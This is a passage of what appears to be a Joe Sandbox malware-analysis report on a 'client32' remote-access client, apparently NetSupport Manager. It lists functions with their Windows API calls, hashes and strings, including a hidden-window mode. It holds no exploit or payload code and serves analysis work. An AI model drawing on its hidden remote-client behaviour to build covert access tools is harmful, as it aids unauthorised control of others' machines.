                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 110CF2FC
                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 110CF3C3
                                                                                                                                                                                • CreateWindowExA.USER32(00000000,Static,11195264,5000000E,?,?,00000010,00000010,?,00003A97,00000000,00000000), ref: 110CF400
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$Rect$ClientCreateItemLongObjectShowText
                                                                                                                                                                                • String ID: ..\ctl32\nsmdlg.cpp$Static$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                                                                                                                                • API String ID: 4172769820-2231854162
                                                                                                                                                                                • Opcode ID: 76fd0ba861cc2ec8df24fd933a878e2a0ce40aef6226dbdc2e5d368558c1c5e7
                                                                                                                                                                                • Instruction ID: 2d84ac58a4c57407e54c3cb5711102d4444eebaf719169cc73b89b5b27c55d8a
                                                                                                                                                                                • Opcode Fuzzy Hash: 76fd0ba861cc2ec8df24fd933a878e2a0ce40aef6226dbdc2e5d368558c1c5e7
                                                                                                                                                                                • Instruction Fuzzy Hash: 8F81C375E00716ABD721CF64CC85F9EB3F4BB88B08F0045ADE5569B680EB74A940CF92
                                                                                                                                                                                Function 110F70E0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 176libraryloaderCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(Wtsapi32.dll,2520CF5D,?,?,00000000), ref: 110F711B
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7179
                                                                                                                                                                                • wsprintfA.USER32 ref: 110F7235
                                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 110F7242
                                                                                                                                                                                • wsprintfA.USER32 ref: 110F7267
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F72A7
                                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 110F72BC
                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 110F72D0
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressErrorLastLibraryProcwsprintf$FreeLoad
                                                                                                                                                                                • String ID: %u.%u.%u.%u$%x:%x:%x:%x:%x:%x:%x:%x$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
                                                                                                                                                                                • API String ID: 856016564-3838485836
                                                                                                                                                                                • Opcode ID: c907f915077e9c39dbf1f555a8bec6e5ac1bd5acf54f9bae2bc72b2a4c86785f
                                                                                                                                                                                • Instruction ID: 25a542e7ca9f20ccb9d734b321771151ba7e8120a74b68384c663ef2db5eebf1
                                                                                                                                                                                • Opcode Fuzzy Hash: c907f915077e9c39dbf1f555a8bec6e5ac1bd5acf54f9bae2bc72b2a4c86785f
                                                                                                                                                                                • Instruction Fuzzy Hash: 2161B771D042689FDB18CFA98C98AADFFF5BF49301F0581AEF16A97251D6345904CF20
                                                                                                                                                                                Function 11025000 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
                                                                                                                                                                                • SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
                                                                                                                                                                                • SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
                                                                                                                                                                                • SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
                                                                                                                                                                                • SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
                                                                                                                                                                                • GetDC.USER32(?), ref: 11025085
                                                                                                                                                                                • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
                                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 110250A2
                                                                                                                                                                                • GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 110250C7
                                                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 110250CF
                                                                                                                                                                                • SetCaretPos.USER32(?,?), ref: 11025111
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend$ObjectSelect$CaretExtentPoint32ReleaseText
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4100900918-3916222277
                                                                                                                                                                                • Opcode ID: 1913cb99a64acb59ccd2920387ddaf4f4e972cd9a8340c1d82474822cf1c1434
                                                                                                                                                                                • Instruction ID: b0707e50622e5a2dee3f64ca7938c426cfa52823b6f102614556d1b444951bd6
                                                                                                                                                                                • Opcode Fuzzy Hash: 1913cb99a64acb59ccd2920387ddaf4f4e972cd9a8340c1d82474822cf1c1434
                                                                                                                                                                                • Instruction Fuzzy Hash: 84414C71A41318AFEB10DFA4CD84FAEBBF8EF89700F118169F915AB244DB749900CB60
                                                                                                                                                                                Function 111137F0 Relevance: 22.8, APIs: 15, Instructions: 272COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • Arc.GDI32(?,?,?,?,?,?,?,00000000,11001824), ref: 1111385B
                                                                                                                                                                                • Chord.GDI32(?,?,?,?,?,?,?,00000000,11001824), ref: 1111388D
                                                                                                                                                                                • Ellipse.GDI32(?,?,?,?,?), ref: 111138AF
                                                                                                                                                                                • Pie.GDI32(?,?,?,?,?,?,?,00000000,11001824), ref: 111138E1
                                                                                                                                                                                • Polyline.GDI32(?,?,?), ref: 111138F9
                                                                                                                                                                                • Rectangle.GDI32(?,?,?,?,?), ref: 11113914
                                                                                                                                                                                • RoundRect.GDI32(?,?,?,?,?,?,?), ref: 1111393E
                                                                                                                                                                                • CreateRectRgn.GDI32(1111B2F4,1111B2F4,?,1111B2F5), ref: 11113988
                                                                                                                                                                                • FillRgn.GDI32(?,00000000,00000000), ref: 11113997
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 111139A1
                                                                                                                                                                                • SetPolyFillMode.GDI32(?,00000002), ref: 111139F3
                                                                                                                                                                                • Polygon.GDI32(?,?,?), ref: 111139FF
                                                                                                                                                                                • GetObjectA.GDI32(?,00000010,00000000), ref: 11113A91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FillObjectRect$ChordCreateDeleteEllipseModePolyPolygonPolylineRectangleRound
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 235746022-0
                                                                                                                                                                                • Opcode ID: caecdb7f546f04f175310762571a328eec3ccc789f32856ae142c0a15813d26b
                                                                                                                                                                                • Instruction ID: 7693169cdc90fa6887fcadc74f6f841181167e162c7eeaef8afc3e9cd99f23b2
                                                                                                                                                                                • Opcode Fuzzy Hash: caecdb7f546f04f175310762571a328eec3ccc789f32856ae142c0a15813d26b
                                                                                                                                                                                • Instruction Fuzzy Hash: 79B125B5A146059FDB14CF68D984A6BF7F9FF88714B10852DE86ACB648D730E841CB60
                                                                                                                                                                                Function 1111D660 Relevance: 22.7, APIs: 15, Instructions: 153windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 1111D6BE
                                                                                                                                                                                • CreateRectRgn.GDI32(?,?,?,?), ref: 1111D6E6
                                                                                                                                                                                • CombineRgn.GDI32(00000000,00000000,00000000,00000002), ref: 1111D6F7
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 1111D701
                                                                                                                                                                                • CreateRectRgn.GDI32(00000000,00000000,?,?), ref: 1111D735
                                                                                                                                                                                • CombineRgn.GDI32(00000000,00000000,00000000,00000004), ref: 1111D742
                                                                                                                                                                                • SelectClipRgn.GDI32(?,00000000), ref: 1111D759
                                                                                                                                                                                • BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00000042), ref: 1111D783
                                                                                                                                                                                • SelectClipRgn.GDI32(?,00000000), ref: 1111D792
                                                                                                                                                                                • BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00000042), ref: 1111D7BC
                                                                                                                                                                                  • Part of subcall function 11113FA0: IsIconic.USER32(?), ref: 11113FCA
                                                                                                                                                                                  • Part of subcall function 11113FA0: CreateRectRgn.GDI32(?,?,?,?), ref: 11114062
                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 1111D7D1
                                                                                                                                                                                • SelectClipRgn.GDI32(?,00000000), ref: 1111D7E5
                                                                                                                                                                                  • Part of subcall function 1110FC40: EnterCriticalSection.KERNEL32(?), ref: 1110FD83
                                                                                                                                                                                • OffsetRgn.GDI32(00000000,?,?), ref: 1111D7FA
                                                                                                                                                                                • SelectClipRgn.GDI32(?,00000000), ref: 1111D808
                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 1111D80F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ClipCreateRectSelect$DeleteObject$Combine$CriticalEnterIconicOffsetSection
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2624307493-0
                                                                                                                                                                                • Opcode ID: ef1eca74f7ce7da4126ace74684c213ce5a2bba535df29797cd15b87a9bc8e4a
                                                                                                                                                                                • Instruction ID: 84ddac36778523c77c7e55966e0e7ea944c2670e4efe0413cf235aa62501f106
                                                                                                                                                                                • Opcode Fuzzy Hash: ef1eca74f7ce7da4126ace74684c213ce5a2bba535df29797cd15b87a9bc8e4a
                                                                                                                                                                                • Instruction Fuzzy Hash: 2C5143B5740615BFEB089BB0DD89FAAF7ACFB48309F004169F92996644D774BC40CBA0
                                                                                                                                                                                Function 1102370A Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 363windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 1115BAE0: IsIconic.USER32(?), ref: 1115BB87
                                                                                                                                                                                  • Part of subcall function 1115BAE0: ShowWindow.USER32(?,00000009), ref: 1115BB97
                                                                                                                                                                                  • Part of subcall function 1115BAE0: BringWindowToTop.USER32(?), ref: 1115BBA1
                                                                                                                                                                                • CheckMenuItem.USER32(00000000,000013EB,-00000009), ref: 1102384D
                                                                                                                                                                                • ShowWindow.USER32(?,00000003), ref: 110238D1
                                                                                                                                                                                • LoadMenuA.USER32(00000000,000013A3), ref: 110239FB
                                                                                                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 11023A09
                                                                                                                                                                                • CheckMenuItem.USER32(00000000,000013EB,?), ref: 11023A29
                                                                                                                                                                                • GetDlgItem.USER32(?,000013B2), ref: 11023A3C
                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 11023A43
                                                                                                                                                                                • PostMessageA.USER32(?,00000111,?,00000000), ref: 11023A99
                                                                                                                                                                                • DestroyMenu.USER32(?,?,00000000,00000000,00000102,?,?,?,00000000), ref: 11023AA3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Menu$Window$Item$CheckShow$BringDestroyIconicLoadMessagePostRect
                                                                                                                                                                                • String ID: AddToJournal$Chat
                                                                                                                                                                                • API String ID: 693070851-2976406578
                                                                                                                                                                                • Opcode ID: bd90ac1af4df9f2b7f0e52d7e7e5130c4330d32a19c33c8b463783fa97f54ee7
                                                                                                                                                                                • Instruction ID: 808c1e48a155f27d2b3c0586fadc3707d2cf985dccefb9094def5a9ab05a8e38
                                                                                                                                                                                • Opcode Fuzzy Hash: bd90ac1af4df9f2b7f0e52d7e7e5130c4330d32a19c33c8b463783fa97f54ee7
                                                                                                                                                                                • Instruction Fuzzy Hash: 58A10334F44616ABDB08CF64CC85FAEB3E9AB8C704F50452DE6569F6C0DBB4A900CB95
                                                                                                                                                                                Function 1110F3F0 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 218fileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,2520CF5D,?,?,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001), ref: 1110F427
                                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 1110F4FA
                                                                                                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1110F58E
                                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 1110F5B9
                                                                                                                                                                                • WriteFile.KERNEL32(?,PCIR,00000030,?,00000000), ref: 1110F5CE
                                                                                                                                                                                  • Part of subcall function 11110000: InterlockedDecrement.KERNEL32(?), ref: 11110008
                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,1118B168,000000FF), ref: 1110F5F5
                                                                                                                                                                                • _free.LIBCMT ref: 1110F628
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110F665
                                                                                                                                                                                • timeEndPeriod.WINMM(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110F677
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001,2520CF5D,?,?), ref: 1110F681
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$CloseCriticalHandlePointerSectionWrite$DecrementEnterInterlockedLeavePeriod_freetime
                                                                                                                                                                                • String ID: End Record %s$PCIR
                                                                                                                                                                                • API String ID: 1536735032-2672865668
                                                                                                                                                                                • Opcode ID: 1ab6a7f4614c0770b4831eda9600d193abcd5c24bc6486a040184128537dcb43
                                                                                                                                                                                • Instruction ID: c7b3bd1ea8319edfd3cc52dfdc755cda258f2b25611d18eaf89bf58ef2166273
                                                                                                                                                                                • Opcode Fuzzy Hash: 1ab6a7f4614c0770b4831eda9600d193abcd5c24bc6486a040184128537dcb43
                                                                                                                                                                                • Instruction Fuzzy Hash: 32811875A0070AABD724CFA4C881BEBF7F8FF88704F00492DE66A97240D775A941CB91
                                                                                                                                                                                Function 11131320 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 187COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLastError.KERNEL32(?,11139C95,00000000,?,?), ref: 11131428
                                                                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,11139C95,00000000,?,?), ref: 11131457
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLastShowWindow
                                                                                                                                                                                • String ID: #32770$Client$Hidden$StatusMode$UI.CPP$gUI.hidden_window
                                                                                                                                                                                • API String ID: 3252650109-4091810678
                                                                                                                                                                                • Opcode ID: 68dfa1b3a978c61f53ecc40af1327f290213095a8926f233bdb06c51b79a4962
                                                                                                                                                                                • Instruction ID: 1b40a51cdbaebc86ba70b46d463032212dc909346aab7ab50ce078dfded898e8
